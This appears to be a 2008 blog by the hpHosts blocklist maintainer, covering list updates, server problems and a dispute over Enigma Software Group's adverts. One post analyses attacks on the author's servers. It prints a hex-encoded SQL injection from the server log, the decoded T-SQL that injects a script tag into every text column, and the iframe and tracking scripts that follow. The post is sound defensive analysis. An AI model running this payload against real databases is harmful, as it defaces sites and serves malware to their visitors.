Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 31 August 2008

Enigma Software Group: Tracking the Hunter Part 2

I recently spoke with Alvin, CEO of ESG, and he also assured me that ESG dropped the affiliates that were involved in the spamming, always a good thing (whether or not they've re-registered as affiliates is anyone's guess - the internet provides a good enough level of annonimity for spammers, so it will be up to ESG to monitor their affiliates, and of course, whilst we certainly shouldn't be policing companies affiliates, if we report those we do find doing wrong, we can also help)

View the full article;

Monday, 25 August 2008

hpHOSTS - UPDATED August 26th, 2008

hpHOSTS - UPDATED August 26th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 54,010 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 26/08/2008 11:12
  2. Last Verified: 26/08/2008 10:30
Download hpHosts now!

Sunday, 24 August 2008

Exploit efforts increased ......

SQL ExploitYou know you're doing something right when they ramp up their efforts.

I've been seeing these attacks for quite some time now, and they're getting ever more persistent, with the attacks more than doubling within the past few days. The exploit attempts show in the server log as;

2008-08-23 18:32:23 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
(@S); 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1
;+InfoPath.1) - 200 0 0

Previously these attacks were aimed more toward the hpHosts server. Now however, they're aimed at all of the servers on the network, guess I'm annoying the right people???.

The above CAST string is Hex encoded, and decodes to;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select, from sysobjects a,syscolumns b where and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src=""></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src=""></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

This then loads;

vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://
Server IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 24 August 2008
Time: 16:30:54:30
document.write("<iframe width=0 height=0 src=hxxp://></iframe>");
return true;
var js2eus=1;

var yesdata;
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=hxxp://'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe width=0 height=0 src=hxxp://></iframe>");


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

Which loads;

vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://
Server IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 5
Date: 24 August 2008
Time: 16:31:27:31
<script src='hxxp://' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="hxxp://"></script> is using FastFlux and loads;

vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://
Server IP: [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 24 August 2008
Time: 16:39:34:39
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
return -1;
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.42642600 1219592199';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
document.write('<a href="hxxp://" target=_blank title="Õ¾³¤Í³¼Æ">Õ¾³¤Í³¼Æ</a>');
document.write('<img src="hxxp://'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";

Server maintenance

This is a quick note to let you all know that in 11 hours (approx 23:00 GMT), the gateway will be taken offline for maintenance. This is to allow more stringent filters to be put in place, and a move from Windows to Linux, due to the abnormal amount of traffic increasing and thus, overloading the server.

A backup server will be put in place to minimize the downtime. Affected sites include;


Thursday, 21 August 2008

Enigma Software Group removed from hpHosts

As a quick note prior to my next article, I'd like to announce the removal of Enigma Software Group from the hpHosts database.

ESG were listed with the FSA (Fraudulent Security Application) classification. However, my recent testing of SpyHunter, coupled with my research into their current practices, have shown they no longer fit the inclusion criteria. ESG have cleaned house, concerning the issues raised in last years article, and have further modified their adverts to prevent confusion.

ESG could have just went on the offensive and threatened to sue all and sundry, but instead, they've worked to resolve issues, and build relationships instead of destroying them further. This is always a good thing, for the security community as a whole, and more importantly - for you, the user.

Wednesday, 20 August 2008

Enigma Software Group - SpyHunter and Misleading adverts

I re-tested SpyHunter (see references) an hour or two ago, and am pleased to say, the rogue behaviour I previously witnessed, are all but gone - the only problem with the actual program itself, that I have now are;

1. It still requires payment to remove cookies
2. It still does not come with a fully functional trial

However, as I mentioned to Alvin (CEO, Enigma Software Group), I DO have a major problem with ESG themselves, or rather, their misleading advertising practices.

Rather than re-hash it, I'll simply repeat what I sent to Alvin concerning the issue;
Whilst SH itself seems to be no longer presenting with rogue behaviour, I DO still have concerns over ESG's practices, namely the advertising practices. An example of this is;

In the right column, there's an advert which claims to lead to "www{DOT}". This is misleading as it actually leads to "www{DOT}".


On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH (yep, there may be manual instructions, but that’s not mentioned in the advert, so is irrelevant).

Though just one example, it's not isolated to the specific keywords I used for this example - ESG need to resolve this and cease using these practices.


Since publishing this, I've had a response from Alvin on my concerns. Firstly concerning the cookies;
You are entitled to your opinion on this point, I concede that giving cookie
deletion for FREE is reasonable because they are quite harmless, but the
issue is my larger commercial competitors: PCTools, Webroot, Alluria, etc...
Since they are all "pay to remove" cookies, files, and registry entries, and
I know you are aware of this fact. I have to be as competitive as they are.
However, I am open to the idea of removing cookies for free. I have to admit
that is an interesting point....

If SH changes to remove cookies for free, then thats great.

Secondly, on the Google adverts, Alvin advised me that Google has a length restriction on the URL thats placed on the part I mentioned, which explains why it displays as it does. However, in response to this, I've advised that a better option would be to have the main hostname there, instead of the sub-domain part (i.e. instead of He's also advised me that he's ordered his marketing manager to remove the word "free" from the adverts. Definately a good step.

His response to the adverts was rather lengthy to be placed here, so I've posted the abridged version instead;
Steven, in all honesty, the Google PPC backend has a display URL character
limit, so it is a major pain in the behind to have a descriptive sub-domain.
This is not done for any deceptive or malicious reason. This is done so we
can be as descriptive as possible. Have you ever conducted paid campaigns on
Google? You will see what I mean... That bottom field is mandatory... In
fact, it is a useless field. I would rather they get rid of it and allow
more room to be more descriptive on paid ads.

..... snipped
2. On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH
(yep, there may be manual instructions, but that's not mentioned in the
advert, so is irrelevant).

I agree with you on this statement. To say free manual instructions in the
description makes more sense, but I do not want to see the terms "FREE &
REMOVE" on the ad. As you said, it is irrelevant.

This would have been as effective:

Remove VirusHeal
How to Remove VirusHeal.
VirusHeal Removal Instructions

(If it looks a bit weird still, again there is a character restriction per
line on Google Adwords)

I officially ordered my Adwords manager to remove any reference of the word
FREE, so do not go crazy on me if it takes a few days ;) OK? Since it is a
manual task, and the Google Adwords interface is clunky, so bare with me and
then review the changes.

Again, I agree with you on this point, since having the term "FREE" on that
ad is not a value added term for converting customers any way.


Enigma Software Group: Tracking the Hunter

Tuesday, 19 August 2008

Brothersoft gives an example of how best to annoy me ..

Alas annoying me isn't an easy thing to do, I'm a very patient and normally placid person, but as with everyone else - some things just get my goat, and Brothersoft is one of those things.

Long story short, I've been receiving e-mails from them for some time now, that contains;
Hello [ ] [ ]:

In order to prevent unauthorized sign-ups, we want you to confirm your registration request. Verification will allow you to access site features and information only available with registration.

Please confirm your registration by click the link:

Please do not reply to this message, as no recipient has been designated. Replying to this message will not confirm your registration.

Note: If you experience problems with the provided link, simply copy and paste the link above into the address field within your browser.

BrotherSoft Team

Needless to say, I've sent them numerous e-mails telling them I neither requested nor want the account. Most of those times, my e-mails have gone unanswered, sometimes I've gotten a reply such as;
OK,removed.Please come back and check.



My last e-mail to them however, resulted in their sending me the following;
Sorry to inform you your account has been disabled by Brothersoft because of rule infringement.
In this period, you couldn't submit or manage your software.
If any problem or question, please feel free to contact us.

BrotherSoft Team

Oh dear, they've sent me an e-mail telling me my account has been blocked for rule infringement, fantastic - but I DID NOT ASK FOR THE DAMN ACCOUNT TO BEGIN WITH!!!.

Saturday, 16 August 2008

Abnormally high traffic

Alas there is still abnormally high traffic on the hpHosts server. I've been keeping an eye on the server logs over the past few months, and it is apparent that it's either due to HostsMan users sending extremely frequent requests (as mentioned previously) OR lots of people faking the HostsMan user agent (I spoke to HM's developer some time ago and he pondered whether it could be someone faking the UA aswell).

I'm having the server + gateway re-booted as I write this, and will go through the logs once I've got RD access again.

On the plus side, I've also spoken to the developer of WK (the filter I implemented for the server) and he's advised me on how to resolve the access issues for Free Download Manager users. I'll be sorting this out tomorrow.

Tuesday, 12 August 2008

Server filter still causing access problems .....

It seems the filter I implemented, is still causing access problems, this time for those using Free Download Manager (I'll refrain from re-publishing my disdain for this program here - see the forums for the story).

I am working on resolving this, and have actually removed the filter match that was supposed to be causing it (basing it on the log files anyway). However, in the meantime, those using FDM that are unable to access either the forums or the website, can download the hphosts file from the alternate mirrors below;


Windows (ZIP) (also suitable for Linux) (Courtesy Security Cadets)

Windows (Setup) (Courtesy Security Cadets)


If you would like to provide an additional mirror, please get in touch

hpHOSTS - UPDATED August 13th, 2008

hpHOSTS - UPDATED August 13th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,668 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 13/08/2008 03:30

  2. Last Verified: 13/08/2008 03:45

Download hpHosts now!

HOSTS files, IP blacklists, toolbars - is it enough?

HOSTS files, IP blacklists, toolbars - is it enough?

Back in 2006, I wrote an article on the HOSTS file, and how it added an improvement to the security of your computer. Whilst this has not changed, the malware scene has and thus, the security needed to protect your computer, has changed drastically.

HOSTS files

A HOSTS file has never been enough on it's own to protect you, simply because it is far too easy for a malicious program (and depending on your browser settings, a malicious webpage) to completely change or remove, the HOSTS file in seconds, and it is limited to blocking individual hostnames only (it cannot for example, do a wildcard block such as *, and it cannot block IP addresses). Obviously this requires you have a program monitoring the file for changes, such as WinPatrol. So what else is needed?

Announcement & Comments:

Full article published at:

Monday, 11 August 2008

Bah, another Blogspot problem ......

Yep, I've noticed another problem with this blog - I've got it set to pull the latest additions to hpHosts, and for some reason, it's not realised that there's been additions today - it still thinks the last 5 additions were; - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008

.... but nope, the last 5 additions were actually;

2 89-149-194-33.internetser PSH


Yeah - I publish this and the damn thing updates itself, and still incorrectly ....... wtf? and why is it still saying the 10th? - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008

Thursday, 7 August 2008

vURL Desktop Edition



Added: Detect all IP's that a hostname resolves to (including rDNS for those IP's)

Modified: Source button now enabled when clicking to view application log before dissecting site
Modified: Redesigned settings dialog
Modified: Various other modifications

There's also a new change on the Links tab, but I'll let you guys see if you can tell what it is

Wednesday, 6 August 2008

New hpHosts release

hpHOSTS - UPDATED August 6th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,525 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 06/08/2008 18:30

  2. Last Verified: 06/08/2008 18:15

Download hpHosts now!

Tuesday, 5 August 2008

First post .....

Well, I finally got round to creating this, and still don't know if I'll be keeping it.

Anywho, until I decide whether to go with this - or just create a blog myself, then err, welcome hehe.